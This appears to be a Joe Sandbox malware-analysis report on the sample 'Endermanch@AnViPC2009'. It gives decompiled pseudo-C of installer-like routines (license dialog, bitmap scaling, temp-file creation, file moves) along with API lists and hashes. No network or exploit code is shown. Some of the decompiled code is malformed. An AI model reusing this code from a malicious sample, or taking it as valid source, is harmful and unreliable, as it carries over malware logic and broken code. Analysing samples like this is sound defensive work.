                                                                                                                                                      0x004068ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenA.KERNEL32(?,?), ref: 00406864
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,-00000100), ref: 00406878
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 00406893
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,-00000100,00000000,00000000,?,?,<html>,00000006,00000000,<html>), ref: 0040695B
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,000000FF,00000003,-00000100,00000000,00000000), ref: 00406979
                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,00000000,?,?,<html>,00000006,00000000,<html>), ref: 004069AD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AllocCreateStreamVersionlstrlen
                                                                                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$about:blank$utf-8"></head>
                                                                                                                                                      • API String ID: 918982468-1117646011
                                                                                                                                                      • Opcode ID: 9738e37b318953bcb8cd4e6d56100ed86517db4848a0be975dd7c719cd2ec286
                                                                                                                                                      • Instruction ID: 592f9709469bb749250ec95068b8c0ac80250042cc6f7dfb8e9dec69e5aa2f7f
                                                                                                                                                      • Opcode Fuzzy Hash: 9738e37b318953bcb8cd4e6d56100ed86517db4848a0be975dd7c719cd2ec286
                                                                                                                                                      • Instruction Fuzzy Hash: CF51D672504348AFDF21AF74CC84DAE7BA9AF06304F15413AF95AA72D2C678CC24C729
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BA0F(void* __edx, void* __eflags, signed int _a4) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				void _v32;
                                                                                                                                                      				char _v1056;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				struct HWND__* _t15;
                                                                                                                                                      				int _t25;
                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      
                                                                                                                                                      				_t14 = E0040AD00(__eflags);
                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                      					return _t14;
                                                                                                                                                      				}
                                                                                                                                                      				_t15 = GetWindow(_a4, 5);
                                                                                                                                                      				_a4 = _a4 & 0x00000000;
                                                                                                                                                      				_t35 = _t15;
                                                                                                                                                      				_v8 = _t35;
                                                                                                                                                      				if(_t35 == 0) {
                                                                                                                                                      					L12:
                                                                                                                                                      					return _t15;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(_a4 < 0x200) {
                                                                                                                                                      						GetClassNameA(_t35,  &_v1056, 0x400);
                                                                                                                                                      						if(E0040DAE4( &_v1056, "STATIC") == 0 && (GetWindowLongA(_t35, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                                                                                      							_t39 = SendMessageA(_t35, 0x173, 0, 0);
                                                                                                                                                      							if(_t39 != 0) {
                                                                                                                                                      								GetObjectA(_t39, 0x18,  &_v32);
                                                                                                                                                      								_t25 = E0040ACBD(_v24);
                                                                                                                                                      								SendMessageA(_t35, 0x172, 0, E0040ABB5(_t39, E0040AC7A(_v28), _t25));
                                                                                                                                                      								_t47 = _t39 -  *0x4192d0; // 0x19050bc3
                                                                                                                                                      								if(_t47 != 0) {
                                                                                                                                                      									DeleteObject(_t39);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t15 = GetWindow(_t35, 2);
                                                                                                                                                      						_t35 = _t15;
                                                                                                                                                      						if(_t35 != _v8) {
                                                                                                                                                      							_a4 =  &(_a4->i);
                                                                                                                                                      							if(_t35 != 0) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      0x0040ba18
                                                                                                                                                      0x0040ba1f
                                                                                                                                                      0x0040baff
                                                                                                                                                      0x0040baff
                                                                                                                                                      0x0040ba2b
                                                                                                                                                      0x0040ba31
                                                                                                                                                      0x0040ba35
                                                                                                                                                      0x0040ba37
                                                                                                                                                      0x0040ba3c
                                                                                                                                                      0x0040bafd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ba42
                                                                                                                                                      0x0040ba4a
                                                                                                                                                      0x0040ba64
                                                                                                                                                      0x0040ba7d
                                                                                                                                                      0x0040ba9b
                                                                                                                                                      0x0040ba9f
                                                                                                                                                      0x0040baa8
                                                                                                                                                      0x0040bab1
                                                                                                                                                      0x0040bacf
                                                                                                                                                      0x0040bad1
                                                                                                                                                      0x0040bad7
                                                                                                                                                      0x0040bada
                                                                                                                                                      0x0040bada
                                                                                                                                                      0x0040bad7
                                                                                                                                                      0x0040ba9f
                                                                                                                                                      0x0040bae3
                                                                                                                                                      0x0040bae9
                                                                                                                                                      0x0040baee
                                                                                                                                                      0x0040baf0
                                                                                                                                                      0x0040baf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040baf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040baee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bafc

                                                                                                                                                      APIs
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 0040BA2B
                                                                                                                                                      • GetClassNameA.USER32(00000000,?,00000400), ref: 0040BA64
                                                                                                                                                        • Part of subcall function 0040DAE4: CompareStringA.KERNEL32(00000400,00001001,0040BA7B,000000FF,?,000000FF,0040BA7B,?,STATIC), ref: 0040DAFA
                                                                                                                                                      • GetWindowLongA.USER32 ref: 0040BA82
                                                                                                                                                      • SendMessageA.USER32 ref: 0040BA99
                                                                                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0040BAA8
                                                                                                                                                        • Part of subcall function 0040ACBD: GetDC.USER32(00000000), ref: 0040ACC9
                                                                                                                                                        • Part of subcall function 0040ACBD: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040ACD8
                                                                                                                                                        • Part of subcall function 0040ACBD: ReleaseDC.USER32 ref: 0040ACE6
                                                                                                                                                        • Part of subcall function 0040AC7A: GetDC.USER32(00000000), ref: 0040AC86
                                                                                                                                                        • Part of subcall function 0040AC7A: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040AC95
                                                                                                                                                        • Part of subcall function 0040AC7A: ReleaseDC.USER32 ref: 0040ACA3
                                                                                                                                                        • Part of subcall function 0040ABB5: GetDC.USER32(00000000), ref: 0040ABC1
                                                                                                                                                        • Part of subcall function 0040ABB5: CreateCompatibleDC.GDI32(00000000), ref: 0040ABD1
                                                                                                                                                        • Part of subcall function 0040ABB5: CreateCompatibleDC.GDI32(?), ref: 0040ABD8
                                                                                                                                                        • Part of subcall function 0040ABB5: GetObjectA.GDI32(?,00000018,?), ref: 0040ABE6
                                                                                                                                                        • Part of subcall function 0040ABB5: CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC08
                                                                                                                                                        • Part of subcall function 0040ABB5: SelectObject.GDI32(00000000,?), ref: 0040AC1B
                                                                                                                                                        • Part of subcall function 0040ABB5: SelectObject.GDI32(?,00000000), ref: 0040AC26
                                                                                                                                                        • Part of subcall function 0040ABB5: StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC44
                                                                                                                                                        • Part of subcall function 0040ABB5: SelectObject.GDI32(00000000,?), ref: 0040AC4E
                                                                                                                                                        • Part of subcall function 0040ABB5: SelectObject.GDI32(?,?), ref: 0040AC56
                                                                                                                                                        • Part of subcall function 0040ABB5: DeleteDC.GDI32(00000000), ref: 0040AC5F
                                                                                                                                                        • Part of subcall function 0040ABB5: DeleteDC.GDI32(?), ref: 0040AC64
                                                                                                                                                        • Part of subcall function 0040ABB5: ReleaseDC.USER32 ref: 0040AC6A
                                                                                                                                                      • SendMessageA.USER32 ref: 0040BACF
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040BADA
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040BAE3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreateDeleteReleaseWindow$CapsDeviceMessageSend$BitmapClassCompareLongNameStretchString
                                                                                                                                                      • String ID: STATIC
                                                                                                                                                      • API String ID: 1367540300-1882779555
                                                                                                                                                      • Opcode ID: 268420487594ce6d88ac75f857c0ede5cd477e1dda5cee96e764faf45609b51d
                                                                                                                                                      • Instruction ID: 34654543d9d21e434690d81d6379bc3700808d3ca93a5599166f59ff111890e6
                                                                                                                                                      • Opcode Fuzzy Hash: 268420487594ce6d88ac75f857c0ede5cd477e1dda5cee96e764faf45609b51d
                                                                                                                                                      • Instruction Fuzzy Hash: D6210432240209BBDB229B60CD46FEF7678EB44740F108036FA01B61D0DBB899529AAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E0040CB0C(void* __ecx, void* __edx, void* __esi, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				long _t10;
                                                                                                                                                      				long _t11;
                                                                                                                                                      				long _t18;
                                                                                                                                                      				void* _t29;
                                                                                                                                                      				struct HWND__* _t32;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				struct HWND__* _t36;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      
                                                                                                                                                      				_t35 = __edx;
                                                                                                                                                      				_t36 = _a4;
                                                                                                                                                      				E00403059(__edx, _t36, _a8, _a12, _a16, "LICENSEDLG", 0, 0);
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					_t10 =  *0x4192d4; // 0xb0335
                                                                                                                                                      					_t38 = SendMessageA;
                                                                                                                                                      					__eflags = _t10;
                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                      						SendMessageA(_t36, 0x80, 1, _t10);
                                                                                                                                                      					}
                                                                                                                                                      					_t11 =  *0x4192d0; // 0x19050bc3
                                                                                                                                                      					__eflags = _t11;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						SendDlgItemMessageA(_t36, 0x66, 0x172, 0, _t11);
                                                                                                                                                      					}
                                                                                                                                                      					E0040BA0F(_t35, __eflags, _t36);
                                                                                                                                                      					_t32 = GetDlgItem(_t36, 0x65);
                                                                                                                                                      					SendMessageA(_t32, 0x435, 0, 0x10000);
                                                                                                                                                      					SendMessageA(_t32, 0x443, 0, GetSysColor(0xf));
                                                                                                                                                      					E0040BF72(_t35, _t38, _t36,  *0x41a818, 3);
                                                                                                                                                      					_t18 =  *0x41a820;
                                                                                                                                                      					__eflags = _t18;
                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						_push(1);
                                                                                                                                                      						L13:
                                                                                                                                                      						EndDialog(_t36, ??);
                                                                                                                                                      						goto L14;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t34 =  *0x418ec8; // 0x0
                                                                                                                                                      						E00406D16(_t34,  *0x414c74, _t32, _t18);
                                                                                                                                                      						E0040A1DE( *0x41a820);
                                                                                                                                                      						L14:
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t29 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}












                                                                                                                                                      0x0040cb0c
                                                                                                                                                      0x0040cb11
                                                                                                                                                      0x0040cb27
                                                                                                                                                      0x0040cb2f
                                                                                                                                                      0x0040cb34
                                                                                                                                                      0x0040cb54
                                                                                                                                                      0x0040cb5a
                                                                                                                                                      0x0040cb60
                                                                                                                                                      0x0040cb62
                                                                                                                                                      0x0040cb6d
                                                                                                                                                      0x0040cb6d
                                                                                                                                                      0x0040cb6f
                                                                                                                                                      0x0040cb74
                                                                                                                                                      0x0040cb76
                                                                                                                                                      0x0040cb82
                                                                                                                                                      0x0040cb82
                                                                                                                                                      0x0040cb89
                                                                                                                                                      0x0040cb9e
                                                                                                                                                      0x0040cba6
                                                                                                                                                      0x0040cbb9
                                                                                                                                                      0x0040cbc4
                                                                                                                                                      0x0040cbc9
                                                                                                                                                      0x0040cbcf
                                                                                                                                                      0x0040cbd1
                                                                                                                                                      0x0040cbf3
                                                                                                                                                      0x0040cbf3
                                                                                                                                                      0x0040cbf5
                                                                                                                                                      0x0040cbf6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cbd3
                                                                                                                                                      0x0040cbd3
                                                                                                                                                      0x0040cbe1
                                                                                                                                                      0x0040cbec
                                                                                                                                                      0x0040cbfc
                                                                                                                                                      0x0040cbfe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cbfe
                                                                                                                                                      0x0040cbd1
                                                                                                                                                      0x0040cb37
                                                                                                                                                      0x0040cb47
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb47
                                                                                                                                                      0x0040cb3d
                                                                                                                                                      0x0040cb3e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb45
                                                                                                                                                      0x0040cb4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb4e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CB6D
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000172,00000000,19050BC3), ref: 0040CB82
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040CB91
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CBA6
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040CBAA
                                                                                                                                                      • SendMessageA.USER32 ref: 0040CBB9
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040CBF6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item$ColorDialog
                                                                                                                                                      • String ID: LICENSEDLG
                                                                                                                                                      • API String ID: 1567230415-2177901306
                                                                                                                                                      • Opcode ID: 024860b8d448d8573bbdeca29b64f752bb975fd9adc44ee1d7b468c070fba27b
                                                                                                                                                      • Instruction ID: c28829b0c4744746a20f643c9fd0defff009b081001e5734792abdb12e0319b8
                                                                                                                                                      • Opcode Fuzzy Hash: 024860b8d448d8573bbdeca29b64f752bb975fd9adc44ee1d7b468c070fba27b
                                                                                                                                                      • Instruction Fuzzy Hash: 4D21A131240209FAE6216F64ACC6FBB36BDE705B44F008036F600F91E0CAB99C52A76D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00406675(intOrPtr __ecx) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				short _v32;
                                                                                                                                                      				struct tagMSG _v60;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				intOrPtr* _t25;
                                                                                                                                                      				short _t28;
                                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                                      
                                                                                                                                                      				_v12 = __ecx;
                                                                                                                                                      				_v8 = GetTickCount();
                                                                                                                                                      				_t23 = GetTickCount() - _v8;
                                                                                                                                                      				while(_t23 <= 0x2710) {
                                                                                                                                                      					_t25 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                      					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
                                                                                                                                                      					if(_v16 != 4) {
                                                                                                                                                      						if(PeekMessageA( &_v60, 0, 0, 0, 0) != 0) {
                                                                                                                                                      							TranslateMessage( &_v60);
                                                                                                                                                      							DispatchMessageA( &_v60);
                                                                                                                                                      							GetMessageA( &_v60, 0, 0, 0);
                                                                                                                                                      						}
                                                                                                                                                      						_t23 = GetTickCount() - _v8;
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					break;
                                                                                                                                                      				}
                                                                                                                                                      				__imp__#8( &_v32);
                                                                                                                                                      				_t28 = 3;
                                                                                                                                                      				_v32 = _t28;
                                                                                                                                                      				_t30 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                      				_v24 = 0x96;
                                                                                                                                                      				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
                                                                                                                                                      			}













                                                                                                                                                      0x00406684
                                                                                                                                                      0x00406689
                                                                                                                                                      0x0040668e
                                                                                                                                                      0x004066eb
                                                                                                                                                      0x0040669d
                                                                                                                                                      0x004066a7
                                                                                                                                                      0x004066b1
                                                                                                                                                      0x004066c3
                                                                                                                                                      0x004066c9
                                                                                                                                                      0x004066d3
                                                                                                                                                      0x004066e0
                                                                                                                                                      0x004066e0
                                                                                                                                                      0x004066e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004066e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004066b1
                                                                                                                                                      0x004066f3
                                                                                                                                                      0x004066fb
                                                                                                                                                      0x00406701
                                                                                                                                                      0x00406708
                                                                                                                                                      0x0040670f
                                                                                                                                                      0x00406723

                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406687
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040668C
                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004066BB
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004066C9
                                                                                                                                                      • DispatchMessageA.USER32 ref: 004066D3
                                                                                                                                                      • GetMessageA.USER32 ref: 004066E0
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004066E6
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004066F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4242828014-0
                                                                                                                                                      • Opcode ID: 1eccd4a20faceeccb654432c3d422e89937423dbc43f928823b2826d10039a86
                                                                                                                                                      • Instruction ID: e0ae3d4bd60ead943df741a1fb770118881d01034fcd83090d0ffaa80e49bef7
                                                                                                                                                      • Opcode Fuzzy Hash: 1eccd4a20faceeccb654432c3d422e89937423dbc43f928823b2826d10039a86
                                                                                                                                                      • Instruction Fuzzy Hash: 1E210B71D00209AFDB00DBE4DD88DDEBBBCEF48315F108866F506E7160D6759A55CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E0040C59B(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                      				void* _t230;
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				void* _t307;
                                                                                                                                                      				void* _t309;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t307 = __esi;
                                                                                                                                                      					if( *((intOrPtr*)(_t309 + 0x10)) != 1) {
                                                                                                                                                      						goto L103;
                                                                                                                                                      					}
                                                                                                                                                      					L88:
                                                                                                                                                      					__ebp - 0xc34 = GetTempPathA(0x400, __ebp - 0xc34);
                                                                                                                                                      					__ebp - 0xc34 = E004076A1(__ebp - 0xc34);
                                                                                                                                                      					 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                                                                      					_push(0);
                                                                                                                                                      					__ebx = "%s%s%d";
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L90:
                                                                                                                                                      						__eax = __ebp - 0xc34;
                                                                                                                                                      						__eax = __ebp - 0x834;
                                                                                                                                                      						__eax =  *__edi(__ebp - 0x834, __ebx, __ebp - 0xc34,  *0x41409c);
                                                                                                                                                      						__esp = __esp + 0x14;
                                                                                                                                                      						__eax = __ebp - 0x834;
                                                                                                                                                      						__eax = __esi->i(__ebp - 0x834);
                                                                                                                                                      						if(__eax == 0xffffffff) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						L89:
                                                                                                                                                      						_t127 = __ebp - 4;
                                                                                                                                                      						 *_t127 =  *(__ebp - 4) + 1;
                                                                                                                                                      						_push( *(__ebp - 4));
                                                                                                                                                      					}
                                                                                                                                                      					L91:
                                                                                                                                                      					__ebp - 0x834 = SetDlgItemTextA( *(__ebp + 8), 0x65, __ebp - 0x834);
                                                                                                                                                      					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                      						while(1) {
                                                                                                                                                      							L152:
                                                                                                                                                      							_t230 = _t309 - 0x54dc;
                                                                                                                                                      							_t231 = E0040B5EC(0x1000, _t307);
                                                                                                                                                      							 *((intOrPtr*)(_t309 + 0xc)) = _t231;
                                                                                                                                                      							asm("ror byte [edi], 0x85");
                                                                                                                                                      							[far dword [esi+0x5b]( *((intOrPtr*)(_t309 + 0xc)), _t230, _t309 - 0x1c34, _t309 - 5, _t309 + 0xf);
                                                                                                                                                      							_t307 = GetFileAttributesA;
                                                                                                                                                      							_t232 = _t309 - 0x1c34;
                                                                                                                                                      							 *(_t309 - 4) = _t309 - 0xb4dc;
                                                                                                                                                      							 *((intOrPtr*)(_t309 - 0xc)) = 6;
                                                                                                                                                      							goto L2;
                                                                                                                                                      							L4:
                                                                                                                                                      							while(lstrcmpiA(_t309 - 0x54dc,  *(0x4140b8 +  *(_t309 - 4) * 4)) != 0) {
                                                                                                                                                      								 *(_t309 - 4) =  *(_t309 - 4) + 1;
                                                                                                                                                      								if( *(_t309 - 4) < 0xd) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L152;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							if( *(_t309 - 4) > 0xc) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							L8:
                                                                                                                                                      							switch( *((intOrPtr*)( *(_t309 - 4) * 4 +  &M0040CA42))) {
                                                                                                                                                      								case 0:
                                                                                                                                                      									L9:
                                                                                                                                                      									__eflags =  *((intOrPtr*)(_t309 + 0x10)) - 2;
                                                                                                                                                      									if( *((intOrPtr*)(_t309 + 0x10)) != 2) {
                                                                                                                                                      										goto L152;
                                                                                                                                                      									}
                                                                                                                                                      									L10:
                                                                                                                                                      									GetCurrentDirectoryA(0x400, _t309 - 0x434);
                                                                                                                                                      									E0040A450(_t309 - 0xc34, _t309 - 0x434);
                                                                                                                                                      									E004076A1(_t309 - 0xc34);
                                                                                                                                                      									E0040A5BB(_t309 - 0xc34, _t309 - 0x1c34);
                                                                                                                                                      									E00405B6F(_t309 - 0x40dc);
                                                                                                                                                      									E00405B9F(_t309 - 0x40dc, _t309 - 0xc34);
                                                                                                                                                      									E00403517(_t309 - 0x30d4);
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t301 = _t309 - 0x40dc;
                                                                                                                                                      									_t252 = E00405F6F(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                      									__eflags = _t252;
                                                                                                                                                      									if(_t252 == 0) {
                                                                                                                                                      										L27:
                                                                                                                                                      										E00405B8C(_t309 - 0x40dc);
                                                                                                                                                      										goto L152;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t295 = "%s.%d.tmp";
                                                                                                                                                      										do {
                                                                                                                                                      											L12:
                                                                                                                                                      											SetFileAttributesA(_t309 - 0x30d4, 0);
                                                                                                                                                      											__eflags =  *((char*)(_t309 - 0x24c4));
                                                                                                                                                      											if( *((char*)(_t309 - 0x24c4)) == 0) {
                                                                                                                                                      												L18:
                                                                                                                                                      												_t257 = GetFileAttributesA(_t309 - 0x30d4);
                                                                                                                                                      												__eflags = _t257 - 0xffffffff;
                                                                                                                                                      												if(_t257 == 0xffffffff) {
                                                                                                                                                      													goto L26;
                                                                                                                                                      												}
                                                                                                                                                      												L19:
                                                                                                                                                      												_t261 = DeleteFileA(_t309 - 0x30d4);
                                                                                                                                                      												__eflags = _t261;
                                                                                                                                                      												if(_t261 != 0) {
                                                                                                                                                      													goto L26;
                                                                                                                                                      												} else {
                                                                                                                                                      													 *(_t309 - 4) =  *(_t309 - 4) & _t261;
                                                                                                                                                      													_push(_t261);
                                                                                                                                                      													goto L22;
                                                                                                                                                      													L22:
                                                                                                                                                      													wsprintfA(_t309 - 0x834, _t295, _t309 - 0x30d4);
                                                                                                                                                      													_t311 = _t311 + 0x10;
                                                                                                                                                      													_t266 = GetFileAttributesA(_t309 - 0x834);
                                                                                                                                                      													__eflags = _t266 - 0xffffffff;
                                                                                                                                                      													if(_t266 != 0xffffffff) {
                                                                                                                                                      														_t60 = _t309 - 4;
                                                                                                                                                      														 *_t60 =  *(_t309 - 4) + 1;
                                                                                                                                                      														__eflags =  *_t60;
                                                                                                                                                      														_push( *(_t309 - 4));
                                                                                                                                                      														goto L22;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t269 = MoveFileA(_t309 - 0x30d4, _t309 - 0x834);
                                                                                                                                                      														__eflags = _t269;
                                                                                                                                                      														if(_t269 != 0) {
